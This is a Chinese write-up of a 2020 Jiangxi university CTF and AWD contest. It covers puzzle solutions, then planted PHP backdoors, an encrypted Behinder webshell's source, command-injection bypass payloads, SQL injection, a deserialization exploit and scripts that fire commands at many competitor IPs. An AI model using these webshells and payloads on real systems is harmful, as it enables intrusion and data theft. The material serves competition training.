2020第三届江西省高校网络安全技能大赛 线下赛 CTFAWD Writeup
文章目录
- CTF
- Misc
- Boring_exe
- !_
- ezAffine
- Daylight
- Blue
- Web
- Aurora website
- web2(忘了叫啥名)
- Crypto
- EasyRSA
- Interceptedtelegram
- AWD
- AWD1
- AWD2
CTF
Misc
Boring_exe
!_
..... ..... ..... ..... !?!!. ?.... ..... ..... ..... .?.?! .?... .!...
..... ..... !.?.. ..... !?!!. ?!!!! !!?.? !.?!! !!!.. ..... ..... .!.?.
..... ...!? !!.?. ..... ..?.? !.?.. ..... .!.?. ..... ..... ..!?! !.?!!
!!!!! !!!!! ?.?!. ?!!!! !!!!! !!!!! !!!.? ..... ..... .!?!! .?... .....
..?.? !.?.. ..... ..... ..!.! !!!!! !!!.! !!!!. ?.... ...!? !!.?. .....
?.?!. ?..!. !!!!! !!!!. !!!!! !!!!. ?.... ..... !?!!. ?.... ....? .?!.?
....! .?.
Ook!密码
Ook!在线解密站:https://tool.bugku.com/brainfuck/
flag{Ookisok}
ezAffine
Daylight
感谢江西师范大学:WAXZ战队师傅提供本题的wp
n=24030381175065789627867818021031309186965318861955402618375094156989560631225056400068280970357343617465261811691559275086986164901405512215968447835573713149231336594364799146504286982124850979481910739400555900516891562640944424296188089156508429086638459243074623801424444379741940400624550247210709108293164193827193821978694274672716764474152393429524314859853376325015012885883855819552203740904895242301492787682366135817255276597250505586595070110209229270379691148517421288247672403709484984083988966720494416926899250840012575481136166618973367329708626081023089829778864549053830890201012932527796486827519
c1=7706442311376298907118381553814187694306437942337200300920018382827744477296762105669322390236380377042026460058526286493515418722731849971411879053724334926597860433790660568227623266459105700578574867980278136078799958698624620338469216407947276632981229373095281141319203245321172350378427449842394930055529441744690732690189155630980736716300509547085032174345753133838250340838995285142338255951756404101946977370148727459867175980397841996210997274012491629791252693401571504945522427861126234928419824136852180508014703063857673244567242488630499415730763245048617632714296374909199028722650732705222178007385
c2=22423938730620301024336096061283705945892027623793660306239291359418958473934583979350384252488494023600239884048653436314101275290157972045454993641659471672605679497398173588217340705125922148550132426481727445141158741816240665812195493040369287582638492321538655028939958996384211181094086886177394010485535445009088322043647955338445795429449360349339936606800994026319620067195422963814641797851423046506617965736694331256799051468484280532276344029152140431817760731420316457245257243157665090587855008596785240088881665435451552191237548113820151383474872494353994135644477990413743416249730006854238049329690
e1=35
e2=42
#python2
import gmpy2
import binascii
import rsa
import math
from Crypto.Util import number
def exgcd(m, n, x, y):if n == 0:x = 1y = 0return (m, x, y)a1 = b = 1a = b1 = 0c = md = nq = int(c / d)r = c % dwhile r:c = dd = rt = a1a1 = aa = t - q * at = b1b1 = bb = t - q * bq = int(c / d)r = c % dx = ay = breturn d, x, y
c1=7706442311376298907118381553814187694306437942337200300920018382827744477296762105669322390236380377042026460058526286493515418722731849971411879053724334926597860433790660568227623266459105700578574867980278136078799958698624620338469216407947276632981229373095281141319203245321172350378427449842394930055529441744690732690189155630980736716300509547085032174345753133838250340838995285142338255951756404101946977370148727459867175980397841996210997274012491629791252693401571504945522427861126234928419824136852180508014703063857673244567242488630499415730763245048617632714296374909199028722650732705222178007385
c2=22423938730620301024336096061283705945892027623793660306239291359418958473934583979350384252488494023600239884048653436314101275290157972045454993641659471672605679497398173588217340705125922148550132426481727445141158741816240665812195493040369287582638492321538655028939958996384211181094086886177394010485535445009088322043647955338445795429449360349339936606800994026319620067195422963814641797851423046506617965736694331256799051468484280532276344029152140431817760731420316457245257243157665090587855008596785240088881665435451552191237548113820151383474872494353994135644477990413743416249730006854238049329690e1=35
e2=42
e1=e1//7
e2=e2//7
n=24030381175065789627867818021031309186965318861955402618375094156989560631225056400068280970357343617465261811691559275086986164901405512215968447835573713149231336594364799146504286982124850979481910739400555900516891562640944424296188089156508429086638459243074623801424444379741940400624550247210709108293164193827193821978694274672716764474152393429524314859853376325015012885883855819552203740904895242301492787682366135817255276597250505586595070110209229270379691148517421288247672403709484984083988966720494416926899250840012575481136166618973367329708626081023089829778864549053830890201012932527796486827519ans=exgcd(e1,e2,0,0)
s1=ans[1]
s2=ans[2]
m=(gmpy2.powmod(c1,s1,n)*gmpy2.powmod(c2,s2,n))%n
print gmpy2.iroot(m,7)[1]
while gmpy2.iroot(m,7)[1]==False:m=m+n
print m
print number.long_to_bytes(gmpy2.iroot(m,7)[0])
flag{1_0nly_see_d4ylight_d4ylight}
Blue
binwalk
分析
foremost
分离
zip伪加密
得到blindsql.pcapng
根据文件名称都知道这是sql盲注
的流量包,所以直接过滤出http
的包就行了
这是直接GET
传参的,可以过滤的更仔细一点
http.request.method==GET
sql盲注分析
,可以看到flag字段的第一位内容的ascii码为:102
>>> chr(102)
'f'
以此类推
flag{Gre4t_j0B_ON_This_Blue_sh4rk}
Web
Aurora website
上传图片,修改Content-type
,根据提示,得知这里应该是条件竞争
使用burp intruder
不断发包即可
web2(忘了叫啥名)
感谢江西理工大学:Stalker战队师傅的思路
Crypto
EasyRSA
flag{We1c0meCtf3r_elab}
Interceptedtelegram
摩斯密码
.- -.-. - .. ----- -. --.- ..- .. -.-. -.-
摩斯密码在线:http://www.zhongguosou.com/zonghe/moersicodeconverter.aspx
flag{ACTI0NQUICK}
AWD
AWD1
awd1
├── about.php
├── admin
│ ├── footer.php
│ ├── header.php
│ ├── index.php
│ ├── logout.php
│ ├── upload
│ │ ├── 1596596144.png
│ │ ├── 1600179756.php
│ │ ├── 1600180813.exe
│ │ └── .library.php
│ └── upload.php
├── config.php
├── contact.php
├── css
│ ├── bootstrap.css
│ ├── chocolat.css
│ ├── flexslider.css
│ └── style.css
├── data
│ ├── flot-data.js
│ └── morris-data.js
├── footer.php
├── gulpfile.js
├── header.php
├── images
│ ├── 10.jpg
│ ├── 11.jpg
│ ├── 12.jpg
│ ├── 13.jpg
│ ├── 14.jpg
│ ├── 15.jpg
│ ├── 16.jpg
│ ├── 17.jpg
│ ├── 1.jpg
│ ├── 1.png
│ ├── 2.jpg
│ ├── 2.png
│ ├── 3.jpg
│ ├── 3.png
│ ├── 4.jpg
│ ├── 4.png
│ ├── 5.jpg
│ ├── 5.png
│ ├── 6.jpg
│ ├── 7.jpg
│ ├── 8.jpg
│ ├── 9.jpg
│ ├── banner1.jpg
│ ├── banner.jpg
│ ├── close.png
│ ├── co.png
│ ├── img-sp.png
│ ├── left.png
│ └── right.png
├── index.php
├── js
│ ├── bootstrap.js
│ ├── jquery-1.11.1.min.js
│ ├── jquery.chocolat.js
│ ├── jquery.flexslider.js
│ └── sb-admin-2.js
├── less
│ ├── mixins.less
│ ├── sb-admin-2.less
│ └── variables.less
├── login.php
├── search.php
├── ser.php
├── services.php
├── .shell.php
├── single.php
└── Wopop_files├── askgreen.png├── errorred.png├── google_jquery.min.js├── google_jquery-ui.min.js├── JQuery.cookie.js├── jquery.pagination.js├── jquery.ui.all.css├── loading1.gif├── loadingpn.gif├── login_bgx.gif├── login.js├── login_m_bg.png├── logo.png├── okgreen.png├── pagination.css├── site_bg.png├── style.css├── style_log.css├── userpanel.css└── webtemples.js8 directories, 85 files
利用点1
后门文件:awd1/.shell.php
<?php
$key = $_POST["cmd"];
if(isset($key)){$key = str_replace("flag","",$key);
}
eval($key);
?>
只是把flag
字符给直接替换为空,利用方法很多
cmd=system("cat /flflagag.txt");
cmd=system("cat /fl''ag.txt");
cmd=system("cat /fla'g'.txt");
cmd=system("cat /fl${9}ag.txt");
cmd=system("cat /fl${IFS}ag.txt");
cmd=system("cat /fl\ag.txt");
cmd=system("cat /`echo 'ZmxhZy50eHQ=' | base64 -d`");
........
import requestsdef post_shell(ip_list):flag_path = '/.shell.php'#shell路径post_data = 'cmd=system("cat /flflagag.txt");'for i in ip_list:header_info = {'Host':i,'User-Agebt':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2','Accept-Encoding':'gzip, deflate','Content-Type':'application/x-www-form-urlencoded'}flag_url = 'http://'+i+flag_pathres = requests.post(url=flag_url,data=post_data,headers=header_info)print("[+]{0}: {1}\n".format(i,res.text))if __name__ == '__main__':ip_list = \['172.20.102.101','172.20.103.101','172.20.104.101','172.20.105.101','172.20.106.101','172.20.107.101','172.20.108.101','172.20.109.101','172.20.110.101','172.20.111.101','172.20.112.101']post_shell(ip_list)
利用点2
任意文件读取:awd1/about.php
<?php$file=$_GET['file'];$file = str_replace("flag","",$file);$file = str_replace("../","",$file);$file = str_replace("..","",$file);$file = str_replace("file://","",$file);@print_r(file_get_contents($file));
?>
利用file://
伪协议读绝对路径即可,AWD环境中flag的绝对路径都已知:/flag.txt
?file=fifile://le:///flflagag.txt
?file=php://filter/read=convert.base64-encode/resource=/flflagag.txt
......
利用点3
代码执行:awd1/config.php
//根目录
$basedir = '';
$shell=@$_POST['shell'];
if(preg_match('/(system|exec|shell|file_|call|open|preg|eval|assert|pass|include|require|key)/i', $shell)) {exit();
}
@eval($shell);
参数绕过代码执行
shell=(s.y.s.t.e.m)('cat /flag.txt');
shell="\x73\x79\x73\x74\x65\x6d"('cat /flag.txt');
利用点4
任意文件读取:awd1/concat.php
<?phpinclude 'header.php';$file_path = @$_GET['path'];if(file_exists($file_path)){$fp = fopen($file_path,"r");$str = fread($fp,filesize($file_path));echo $str = str_replace("\r\n","<br />",$str);}
?>
?path=/flag.txt
?path=/etc/passwd
利用点5
参数绕过命令执行:awd1/footer.php
<?php $shell=@$_POST['shell'];if(preg_match('/(cat|\ |more|flag)/i',$shell)&&str_replace(" ","",$shell)) {exit();}else{@system($shell);}
?>
shell=ca''t</fl''ag.txt
shell=`echo${IFS}Y2F0IC9mbGFnLnR4dAo=|base64${IFS}-d`
shell=a=ca;b=t;c=fl;d=ag;$a$b${IFS}/$c$d.txt
利用点6
注入:awd1/login.php
<?phpinclude_once('config.php');if (!empty($_POST['username'])) {$user=$_POST['username'];$pass=$_POST['password'];$query = "SELECT * FROM admin WHERE user_name='{$user}' and user_pass='{$pass}' ";$data = mysqli_query($dbc,$query); if (mysqli_num_rows($data) == 1) {$row = mysqli_fetch_array($data);$_SESSION['username'] = $row['user_name'];header('Location: ./admin/index.php');}else{echo '<hr/><center><br/>用户名:',$user,'<br/>密码:',$pass,'<br/><br/>用户名密码错误</center>';}}
?>
利用点7
注入:awd1/search.php
<?phpinclude 'header.php';include_once('config.php');$id=$_GET['id'];$check = eregi('select|insert|update|delete|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile', $id);if($check){echo "Invalid strings!!!Please try agine!";
}else{$query = "SELECT * FROM news WHERE id=$id";$data = mysqli_query($dbc,$query); $com = mysqli_fetch_array($data);
}
?>
eregi()
函数可以使用%00
截断,然后进行注入
ereg()
和eregi()
函数在PHP 7
中被弃用了,我这里的容器环境是PHP 7.3
,测试时会返回致命错误
懒得测试了…
利用点8
反序列化代码执行:awd1/ser.php
<?php
class Smi1e
{protected $ClassObj;function __construct() {$this->ClassObj = new safe();}function __destruct() {$this->ClassObj->action();}
}class safe
{function action() {echo "Here is safe";}
}class unsafe
{private $data;function action() {eval($this->data);}
}unserialize(@$_GET['test']);
直接构造poc
<?php
class Smi1e
{protected $ClassObj;function __construct() {$this->ClassObj = new unsafe();}function __destruct() {$this->ClassObj->action();}
}
class unsafe
{private $data="system('cat /flag.txt');";function action() {eval($this->data);}
}$res = new Smi1e();
echo urlencode(serialize($res));
?>
?test=O%3A5%3A%22Smi1e%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00ClassObj%22%3BO%3A6%3A%22unsafe%22%3A1%3A%7Bs%3A12%3A%22%00unsafe%00data%22%3Bs%3A24%3A%22system%28%27cat+%2Fflag.txt%27%29%3B%22%3B%7D%7D
PS:吐槽一下出题人写的这个Smi1e
类名,这Smi1e
直接让我看成Smile
。。。。。。。
利用点9
命令执行:awd1/admin/footer.php
<?php $shell=@$_POST['shell'];@system($shell);if($shell !=""){exit();}
?>
shell=cat /flag.txt
利用点10
直接送flag:awd1/admin/index.php
<!-- banner --><div class="banner1"></div>
<!-- //banner -->
<!-- single --><div class="single"><div class="container"><div class="single-page-artical"><div class="artical-content"><h3>flag:<?php print_r(file_get_contents('/flag'));?></h3><img class="img-responsive" src="../images/banner.jpg" alt=" " /><p></p></div>
不过我记得比赛的时候,flag的路径及文件名是:/flag.txt
,所以这里比赛的时候是读不出来的
修改为/flag.txt
即可读到flag
利用点11
任意文件上传:awd1/admin/upload.php
<html lang="zh-CN"><head><meta charset="utf-8">
<?php
include_once('../config.php');
if (isset($_SESSION['username'])) {include_once('header.php');$html_username = htmlspecialchars($_SESSION['username']);if(isset($_SESSION['error_info']) && $_SESSION['error_info'] != '') {echo $_SESSION['error_info'];$_SESSION['error_info'] = '';}
}
else {header('Location: ../login.php');
}
$error=$_FILES['pic']['error'];
$tmpName=$_FILES['pic']['tmp_name'];
$name=$_FILES['pic']['name'];
$size=$_FILES['pic']['size'];
$type=$_FILES['pic']['type'];
try{if($name!==""){$name1=substr($name,-4);if(is_uploaded_file($tmpName)){$time=time();$rootpath='./upload/'.$time.$name1;$file=fopen($tmpName, "r") or die('No such file!');$content=fread($file, filesize($tmpName));if(strstr($content,'fuck')){exit("<script language='JavaScript'>alert('You should not do this!');window.location='index.php?page=submit'</script>");}if(!move_uploaded_file($tmpName,$rootpath)){echo "<script language='JavaScript'>alert('文件移动失败!');window.location='index.php?page=submit'</script>";exit;}}echo "上传成功:/upload/".$time.$name1;}
}
catch(Exception $e)
{echo "ERROR";
}
//
require('footer.php');?></html>
在awd1/admin/upload/1600179756.php
题目本身存放了一个命令执行后门
//1600179756.php
<?php system($_GET['cmd']);?>
利用点12
冰蝎马:awd1/admin/upload/.library.php
<?php
@error_reporting(0);
session_start();
if (isset($_GET['djicoieDJNCIVD']))
{$key=substr(md5(uniqid(rand())),16);$_SESSION['k']=$key;print $key;
}
else
{$key=$_SESSION['k'];$post=file_get_contents("php://input");if(!extension_loaded('openssl')){$t="base64_"."decode";$post=$t($post."");for($i=0;$i<strlen($post);$i++) {$post[$i] = $post[$i]^$key[$i+1&15]; }}else{$post=openssl_decrypt($post, "AES128", $key);}$arr=explode('|',$post);$func=$arr[0];$params=$arr[1];class C{public function __construct($p) {eval($p."");}}@new C($params);
}
?>
冰蝎马:https://www.t00ls.net/articles-56337.html
PS C:\Users\Administrator\Desktop> php -r "echo openssl_encrypt('|system(\'whoami\');','AES128','');"
sbD9xXGKpb2/BSn/O/gPNg0MrbwusxVXLEVTNRXyGcc=
AWD2
利用点1
文件读取直接送flag:ecshop/a.php
<?php
if(isset($_GET['shop'])){echo file_get_contents(base64_decode('L2ZsYWcudHh0'));}
?>
PS C:\Users\Administrator> php -r "var_dump(base64_decode('L2ZsYWcudHh0'));"
string(9) "/flag.txt"
import requestsdef get_shell(ip_list):flag_path = '/a.php'pwd = 'shop'command = 'test'for i in ip_list:flag_url = 'http://'+i+flag_path+'/?'+pwd +'='+commandres = requests.get(url=flag_url)print("[+]{0}: {1}\n".format(i,res.text))if __name__ == '__main__':ip_list = \['172.20.102.102','172.20.103.102','172.20.104.102','172.20.105.102','172.20.106.102','172.20.107.102','172.20.108.102','172.20.109.102','172.20.110.102','172.20.111.102','172.20.112.102']get_shell(ip_list)
利用点2
命令执行:ecshop/api.php
$hook = $_GET['s'];
if(isset($hook)){echo `$hook`;
}
?s=cat /flag.txt
利用点3
文件读取直接送flag:ecshop/check_file.php
if(isset($_GET['shop'])){echo file_get_contents(base64_decode('L2ZsYWcudHh0'));}
利用点4
文件读取送flag:ecshop/config.php
f(isset($_GET['shop'])){echo file_get_contents(base64_decode('ZmxhZy50eHQ='));}
?><?php
if(isset($_GET['shop'])){echo file_get_contents(base64_decode('ZmxhZy50eHQ='));}
?>
不过这里flag.txt
路径写错了,所以读不出来
PS C:\Users\Administrator> php -r "var_dump(base64_decode('ZmxhZy50eHQ='));"
string(8) "flag.txt"
2020第三届江西省高校网络安全技能大赛 线下赛 CTFAWD Writeup相关推荐
- 2020 第三届江西省高校网络安全技能大赛 线上赛Writeup
赛题类型 Misc Misc1-Hello Misc2-encrypt Misc3-jump Misc4-Burps Misc5-Trees Misc6-qrcode Misc7-blind Misc ...
- 第三届江西省高校网络安全技能大赛 部分wpCrypto的疑惑
目录 前言 Misc1-Hello Misc2-encrypt Misc3-jump Misc4-Brups Misc5-Trees Misc6-qrcode Misc7-blind Misc8-mu ...
- 第四届江西省高校网络安全技能大赛 决赛 MISC
第四届江西省高校网络安全技能大赛 线下赛MISC 拿到这图片用010editor打开,没看到什么有用的信息,然后用stegsolve打开图片. 在发现是LSB隐写,通道BGR里面有一个rar文件,sa ...
- 2020-第三届江西省高校网络安全技能大赛
Misc-Hello 拿到一串字符串Q01JU0NDVEZ7V2VsY29tZV9DVEZlciF9 猜测是base64编码 解得CMISCCTF{Welcome_CTFer!} Misc-encry ...
- 第四届江西省高校网络安全技能大赛 复现 2021-09-30
文章目录 crypto Yusa的密码学课堂-CBC第二课 Yusa的密码学课堂-CBC第三课 Misc 奇奇怪怪的编码 extractall crypto Yusa的密码学课堂-CBC第二课 题目: ...
- wp篇 AWD某一赛题全流程复现【江西省高校网络安全技能大赛】
一,赛题概述 1概述 这道题目是PbootCMS V3.05,主页面如下. 2配置概述 采用tutum/lamp的镜像,Php 5.3+,其他扩展自行apt安装即可 3漏洞赛题 目前在dump下来的镜 ...
- 【阿尼亚不会CTF】第六届”蓝帽杯“全国大学生网络安全技能大赛—线上初赛部分writeup
啊!!!蓝帽杯第一次加入取证模块呢,取证静态分,CTF动态分,这波是出道即C位,完全挤掉CTF,属于被迫做取证题惹~ 菜鸟阿尼亚会做的题不多,以后也要继续加油哦!!! (点名计算机取证出题人--某某某 ...
- 大家好,我是风溯,第三届百度大学生网络安全技能大赛个人第一
白帽江湖人才辈出,传奇人物不胜枚举,这里只用实力说话,也许你没见过大佬真容,但ta的"传说"或许早有耳闻~ Xrayteam安全团队的xxxeyJ:"挖洞只是展现个人能力 ...
- 2020年全国职业院校技能大赛改革试点赛(中职组)
为赛卷一,环境都是自己做的,仅作参考 网络安全竞赛试题 (一)(总分100分) 赛题说明 一.竞赛项目简介 "网络安全"竞赛共分A. 基础设施设置与安全加固:B. 网络安全事件响应 ...
最新文章
- 【干货书】图、网络与算法
- C++学习笔记-----在重载的赋值运算函数中调用拷贝构造函数
- 洛谷 - P3810 【模板】三维偏序(陌上花开)(CDQ分治套树状数组)
- css实现loading,CSS3 19种LOADING(加载)动效
- 前端学习(2856):简单秒杀系统学习之定时器循环显示
- text/html与text/plain的区别
- gblfy博客配色模板
- ajax then jquery,使用Jquery.ajax()。then()时无法.catch()错误
- Spring Boot的MyBatis注解:@MapperScan和@Mapper
- STL中的序列式容器——priority_queue(优先队列)
- Reinvent the Wheel Often
- Java案例实现用户登录
- 活动报名场地预约自定义表单小程序开发
- autosub字幕自动识别生成-最新windows配置方法
- bmc控制卡_BMC IPMI 管理远程服务器
- CentOS7内存清理脚本
- 1.3 Go语言上手-高质量编程与性能调优实战
- Scratch基础(四):演奏音乐-两只老虎
- pytorch基础(九)- 自定义数据集训练模型 和 迁移学习
- 日置HIOKI PW3198电能质量分析仪
热门文章
- 2023美赛思路2023美国大学生数学建模竞赛思路
- SpringBoot之整合Redis分析和实现-基于Spring Boot2.0.2版本
- 网格平滑基础算法总结
- 文件设置默认打开方式
- 35岁程序员,早到的中年危机
- Mybatis Could not find SQL statement to include with refid ‘xxx‘的问题
- 广州蓝景分享—Web前端开发培训机构如何选择
- 学C语言中输入输出函数,一篇就够了
- JavaScript基础语法(VS Code)
- python魔方方法__getitem__、__setitem__和__len__